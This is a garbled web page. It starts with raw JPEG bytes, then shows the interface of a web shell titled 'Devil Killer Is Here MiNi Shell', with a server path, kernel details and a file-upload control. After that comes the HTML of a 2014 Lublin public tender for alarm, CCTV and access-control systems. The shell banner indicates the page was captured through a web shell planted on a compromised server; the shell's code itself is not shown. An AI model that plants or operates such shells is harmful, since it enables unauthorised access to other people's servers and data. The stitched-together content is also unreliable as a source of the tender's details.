JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140602/117773-N-2014.html

<p class="kh_header"><b>Lublin: wykonanie robót budowlanych polegających na zaprojektowaniu, wykonaniu i uruchomieniu systemu sygnalizacji włamania i napadu (SSWiN), kontroli dostępu (KD), telewizji dozorowej (CCTV) budynku Lubelskiego Centrum Konferencyjnego (LCK) oraz zaprojektowaniu, wykonaniu i uruchomieniu systemu sygnalizacji włamania i napadu (SSWiN), kontroli dostępu (KD), telewizji dozorowej (CCTV) i rejestracji czasu pracy (RCP) w budynku Urzędu Marszałkowskiego (BUM) wraz z przeprowadzeniem szkolenia w tym zakresie [OP-IV.272.83.2014.PWW]</b><br>
<b>Numer ogłoszenia: 117773 - 2014; data zamieszczenia: 02.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Lubelskie , ul. Spokojna 4, 20-074 Lublin, woj. lubelskie, tel. 81 44 16 636, faks 81 44 06 308; 81 44 16 535.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie robót budowlanych polegających na zaprojektowaniu, wykonaniu i uruchomieniu systemu sygnalizacji włamania i napadu (SSWiN), kontroli dostępu (KD), telewizji dozorowej (CCTV) budynku Lubelskiego Centrum Konferencyjnego (LCK) oraz zaprojektowaniu, wykonaniu i uruchomieniu systemu sygnalizacji włamania i napadu (SSWiN), kontroli dostępu (KD), telewizji dozorowej (CCTV) i rejestracji czasu pracy (RCP) w budynku Urzędu Marszałkowskiego (BUM) wraz z przeprowadzeniem szkolenia w tym zakresie [OP-IV.272.83.2014.PWW].</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b></p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy postępowania obejmuje zaprojektowanie i realizację w formie zaprojektuj - wybuduj na terenie budowanych obiektów Lubelskie Centrum Konferencyjne i nowa siedziba Urzędu Marszałkowskiego w Lublinie:
1)	Systemu sygnalizacji włamania i napadu (SSWIN) w następującym zakresie:
	Opracowanie i przedstawienie koncepcji, a następnie projektu Systemu Sygnalizacji Włamania i Napadu (SSWiN) 
	Wykonanie i montaż okablowania
Do poprowadzenia kabli należy starać się wykorzystać istniejące lub przewidywane w dokumentacji projektowej trasy kablowe, po uprzedniej konsultacji z Generalnym Wykonawcą robót budowlanych.
	Zakup i dostawa wymaganych urządzeń (SSWiN) - centrala alarmowa z osprzętem, czujniki, sygnalizatory
	Montaż dostarczonych urządzeń (SSWiN) - centrala alarmowa z osprzętem, czujniki, sygnalizatory
	Zaprogramowanie i Konfiguracja sprzętu
	Wykonanie dokumentacji powykonawczej zintegrowanego systemu
	Przeprowadzenie cyklu trzech szkoleń dla użytkowników w zakresie zarządzania, obsługi i eksploatacji systemu 
2)	Systemu telewizji dozorowej (CCTV) w następującym zakresie:
a)	Opracowanie i przedstawienie koncepcji, a następnie projektu Systemu Telewizji Dozorowej (CCTV),
b)	Wykonanie i montaż okablowania
- sygnałowego do kamer
- zasilającego do kamer, rejestratorów i monitorów.
Do poprowadzenia kabli należy starać się wykorzystać istniejące lub przewidywane w dokumentacji projektowej trasy kablowe, po uprzedniej konsultacji z Generalnym Wykonawcą robót budowlanych.
c)	Dostawa wymaganych urządzeń (CCTV)
- kamery, rejestratory, zasilacze, monitory.
d)	Montaż dostarczonych urządzeń (CCTV)
- kamery, rejestratory, zasilacze, monitory
e)	Zaprogramowanie i Konfiguracja sprzętu
f)	Wykonanie dokumentacji powykonawczej zintegrowanego systemu
g)	Przeprowadzenie cyklu trzech szkoleń dla użytkowników w zakresie zarządzania, obsługi i eksploatacji systemu 
3)	Systemu kontroli dostępu (KD) w następującym zakresie:
a)	Opracowanie i przedstawienie koncepcji, a następnie projektu Systemu kontroli dostępu (KD),
b)	Wykonanie i montaż okablowania
- sygnałowego do czytników
- zasilającego do czytników, rejestratorów.
Do poprowadzenia kabli należy starać się wykorzystać istniejące lub przewidywane w dokumentacji projektowej trasy kablowe, po uprzedniej konsultacji z Generalnym Wykonawcą robót budowlanych.
c)	Dostawa wymaganych urządzeń (KD)
- sterowniki, czytniki, zasilacze, czujniki.
d)	Montaż dostarczonych urządzeń (KD)
- sterowniki, czytniki, zasilacze, czujniki
e)	Zaprogramowanie i Konfiguracja systemu
f)	Wykonanie dokumentacji powykonawczej zintegrowanego systemu
g)	Przeprowadzenie cyklu trzech szkoleń dla użytkowników w zakresie zarządzania, obsługi i eksploatacji systemu 
4)	System rejestracji czasu pracy - wyłącznie w Budynku Urzędu Marszałkowskiego w następującym zakresie:
a)	Opracowanie i przedstawienie koncepcji, a następnie projektu Systemu ewidencji czasu pracy,
b)	Wykonanie i montaż okablowania
- sygnałowego do czytników
- zasilającego do czytników, rejestratorów.
Do poprowadzenia kabli należy starać się wykorzystać istniejące lub przewidywane w dokumentacji projektowej trasy kablowe, po uprzedniej konsultacji z Generalnym Wykonawcą robót budowlanych.
c)	Dostawa wymaganych urządzeń
- sterowniki, rejestratory, czytniki.
d)	Montaż dostarczonych urządzeń 
- sterowniki, rejestratory, czytniki.
e)	Zaprogramowanie i Konfiguracja systemu
f)	Wykonanie dokumentacji powykonawczej zintegrowanego systemu
g)	Przeprowadzenie cyklu trzech szkoleń dla użytkowników w zakresie zarządzania, obsługi i eksploatacji systemu 
5)	zaprojektowanie, dostawa i montaż mebli w pomieszczeniu ochrony.

Szczegółowy zakres prac określa:
a)	załącznik nr 1 - Szczegółowy Opis Przedmiotu Zamówienia (program funkcjonalno-użytkowy)
b)	załącznik nr 1A - Opis - rozmieszczenie systemów zabezpieczeń w pomieszczeniach LCK
c)	załącznik nr 1B - Opis - rozmieszczenie systemów zabezpieczeń w pomieszczeniach BUM
Ofertę oraz niezbędną dokumentację należy opracować na podstawie dokumentacji budowlanej (dostępnej na stronie internetowej:
http://www.umwl.bip.lubelskie.pl/index.php?id=85&p1=szczegoly&p2=29678 
przetarg na Wykonanie robót budowlanych polegających na zrealizowaniu dwóch odrębnych zadań inwestycyjnych pn.Lubelskie Centrum Konferencyjne i Budowa siedziby Urzędu Marszałkowskiego w Lublinie, z niezbędną infrastrukturą techniczną) lub wizji lokalnej na terenie budowy, po uprzednim kontakcie z kierownikiem budowy - panem Adamem Czarnobilskim tel. 691 523 455 i z uwzględnieniem wytycznych oraz minimalnych wymagań technicznych dla poszczególnych urządzeń przedstawionych przez Zamawiającego w założeniach i projektach koncepcyjnych stanowiących załączniki do Opisu przedmiotu zamówienia.
Opracowana przez Wykonawcę dokumentacja projektowa musi posiadać niezbędne uzgodnienia i rysunki warsztatowe, a wykonane instalacje współpracować z bezpośrednio powiązanymi systemami lub urządzeniami, których realizację lub dostawę ma w zakresie Generalny Wykonawca robót budowlanych.
Uwaga:
Jeżeli przy opisie przedmiotu zamówienia wskazana została nazwa producenta, znak towarowy, patent lub pochodzenie w stosunku do określonych materiałów, urządzeń, itp. Zamawiający wymaga, aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń, itp. równoważnych pod warunkiem, że zagwarantują one uzyskanie parametrów technicznych i eksploatacyjnych nie gorszych od założonych w dokumentacji.
Przy realizacji niniejszego zamówienia Wykonawca winien przestrzegać obowiązujących przepisów BHP i dołożyć wszelkich starań do solidnego wykonania przedmiotu zamówienia. 
Wszystkie elementy wyposażenia mają posiadać wymagane prawem Certyfikaty, w tym certyfikat bezpieczeństwa B, Atesty Techniczne, Deklaracje Zgodności oraz spełniać Polskie Normy. Certyfikaty, Atesty i Deklaracje powinny być zgodne z dostarczonymi urządzeniami.
Zamawiający wymaga udzielenia gwarancji na wykonane zamówienie na okres nie krótszy niż 2 lata..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zasady udzielania zamówienń uzupełniających określa par. 7 istotnych postanowień umowy</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 42.96.11.00-1, 32.32.35.00-8, 31.62.53.00-6, 45.30.00.00-0, 45.31.22.00-9, 45.31.20.00-7, 45.31.10.00-0, 51.21.20.00-1, 71.32.10.00-4, 79.63.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Złożona oferta musi być zabezpieczona wadium w wysokości 80 000 zł (osiemdziesiąt tysięcy złotych)
1) Wadium może być wnoszone w jednej lub kilku następujących formach:
a.	pieniądzu;
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
2) W przypadku wniesienia wadium w formie ust. 2 pkt od 2) do 5), do oferty należy dołączyć dokument w formie oryginału.
3)  Wadium wnoszone w pieniądzu, wpłaca się przelewem na konto Urzędu Marszałkowskiego Województwa Lubelskiego w Lublinie: 96 1020 3150 0000 3102 0047 7489 z dopiskiem na przelewie wadium -na wykonanie robót budowlanych polegających na zaprojektowaniu, wykonaniu i uruchomieniu systemu sygnalizacji włamania i napadu  OP-IV.272.83.2014.PWW
Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się dzień i godzinę uznania kwoty wadium na rachunku Zamawiającego.
4) Wadium można wnieść do dnia, w którym upływa termin składania ofert, ale przed nadejściem godziny, do której powinny być złożone oferty.
5) Dokument w formie gwarancji i poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty odpowiadającej wysokości wadium, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń. Jako beneficjenta w dokumencie gwarancji lub poręczenia należy wskazać Województwo Lubelskie z siedzibą w Lublinie.
6) Wykonawca, który nie zabezpieczy oferty akceptowaną formą wadium zostanie przez Zamawiającego wykluczony z postępowania.
7) Wadium musi obejmować okres związania ofertą.
8) Warunki zwrotu i utraty wadium są określone w art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Koncesja na prowadzenie działalności w zakresie ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego wydaną na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145, poz. 1221 z późn. zm.) na prowadzenie działalności w zakresie ochrony osób i mienia, realizowaną w formie zabezpieczenia technicznego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wykaże się wykonaniem co najmniej: 
a)	dwóch usług projektowych w zakresie przygotowania projektów wykonawczych i powykonawczych systemów zarządzania bezpieczeństwem (SSWiN, CCTV, KD, SAP) w dowolnej konfiguracji w okresie ostatnich 3 lat o wartości zamówienia co najmniej 100.000 zł brutto (każda realizacja),
b)	dwóch robót budowlanych w zakresie realizacji i integracji systemów zarządzania bezpieczeństwem (SSWiN, CCTV, KD, SAP) w okresie ostatnich 5 lat o wartości zamówienia co najmniej 1.000.000 zł brutto (każda realizacja), z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączą dowody potwierdzające, że usługi zostały należcie wykonane oraz roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
3.1) potencjał techniczny
     Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
3.2) osoby zdolne do wykonania zamówienia
     Zamawiający uzna, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli wykaże się dysponowaniem następującymi osobami:
a)	kierownik robót instalacji SSWiN, CCTV, KD - min. 4-letnie doświadczenie zawodowe wynikające z posiadanych kwalifikacji/uprawnień w zakresie: montaż, eksploatacja, konserwacja i naprawa elektronicznych urządzeń i systemów alarmowych, montaż, eksploatacja, konserwacja, naprawa i awaryjne otwieranie urządzeń i środków mechanicznych, opracowywanie projektów zabezpieczenia technicznego, organizowanie i kierowanie zespołami pracowników zabezpieczenia technicznego w co najmniej dwóch zakończonych obiektach o powierzchni nie mniejszej niż 3.000m2 z wyłączeniem zabudowy mieszkaniowej wraz z kopią poświadczenia bezpieczeństwa osobowego, wpisany na listę kwalifikowanych pracowników ochrony fizycznej lub kwalifikowanych pracowników zabezpieczenia technicznego 
b)	kierownik robót elektrycznych - uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń elektrycznych, wpisany na listę kwalifikowanych pracowników ochrony fizycznej lub kwalifikowanych pracowników zabezpieczenia technicznego - aktualne zaświadczenie o przynależności do właściwej Izby Inżynierów Budownictwa, minimum 4-letnie doświadczenie w pełnieniu funkcji kierownika robót elektrycznych, 
c)	projektant instalacji elektrycznych - uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych, aktualne zaświadczenie o przynależności do właściwej Izby Inżynierów Budownictwa, minimum 3-letnie doświadczenie w pełnieniu funkcji projektanta robót elektrycznych,
d)	projektant instalacji teletechnicznych - uprawnienia budowlane do projektowania bez ograniczeń w specjalności telekomunikacyjnej, aktualne zaświadczenie o przynależności do właściwej Izby Inżynierów Budownictwa, minimum 3-letnie doświadczenie w pełnieniu funkcji projektanta robót elektrycznych
e)	projektant systemów bezpieczeństwa technicznego, który posiada certyfikat projektanta systemów alarmowych SA1-SA4, oraz doświadczenie w realizacji co najmniej pięciu projektów dotyczących audytów oraz opracowania koncepcji systemów zabezpieczenia technicznego,
f)	2 specjaliści do realizacji robót dotyczących instalacji SSWiN, CCTV, KD - z których każdy posiada licencje pracownika zabezpieczenia technicznego ze wskazaniem numeru i zakresu powierzonych czynności oraz zaświadczenie o ukończeniu kursu w zakresie instalowania systemów alarmowych klasy do SA-4 z min. 2-letnim doświadczeniem zawodowym.
g)	specjalista w zakresie integracji systemów bezpieczeństwa, który ukończył kurs w zakresie integracji oferowanego systemu integracyjnego oraz ukończył szkolenie w zakresie administrowania oferowanego systemu integrującego.
Przez przynależność do właściwej izby samorządu zawodowego, Zamawiający rozumie, iż wskazane osoby są członkami właściwej izby samorządu zawodowego, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane oraz ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r., Nr 5 poz. 42 z późn. zm.) albo samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Przez wpis na listę kwalifikowanych pracowników ochrony fizycznej lub kwalifikowanych pracowników zabezpieczenia technicznego, prowadzone przez Komendanta Głównego Policji, Zamawiający rozumie upoważnienie do wykonywania czynności, realizowanych w formie zabezpieczenia technicznego, polegających na:
1) montażu elektronicznych urządzeń i systemów alarmowych, sygnalizujących zagrożenie chronionych osób i mienia, oraz eksploatacji, konserwacji i naprawach w miejscach ich zainstalowania,
2) montażu urządzeń i środków mechanicznego zabezpieczenia oraz ich eksploatacji, konserwacji, naprawach i awaryjnym otwieraniu w miejscach zainstalowania, oraz do:
a) opracowywania projektów zabezpieczenia technicznego;
b) organizowania i kierowania zespołami pracowników zabezpieczenia technicznego.
Wpisu na listę dokonują komendanci wojewódzcy policji, właściwi ze względu na miejsce zamieszkania osoby, która ubiega się o wpis na listę.
Ww. wymagania może spełniać jedna osoba o ile łączeniu ww. funkcji nie sprzeciwiają się obowiązujące przepisy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna, że Wykonawca znajduje się w sytuacji finansowej zapewniającej wykonanie zamówienia, jeżeli zdolność kredytowa Wykonawcy lub wysokość posiadanych środków będzie nie mniejsza niż 1 000 000,00 PLN.
b)	Zamawiający uzna, że Wykonawca znajduje się w sytuacji ekonomicznej zapewniającej wykonanie zamówienia, jeżeli wykaże, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę: 2 000 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

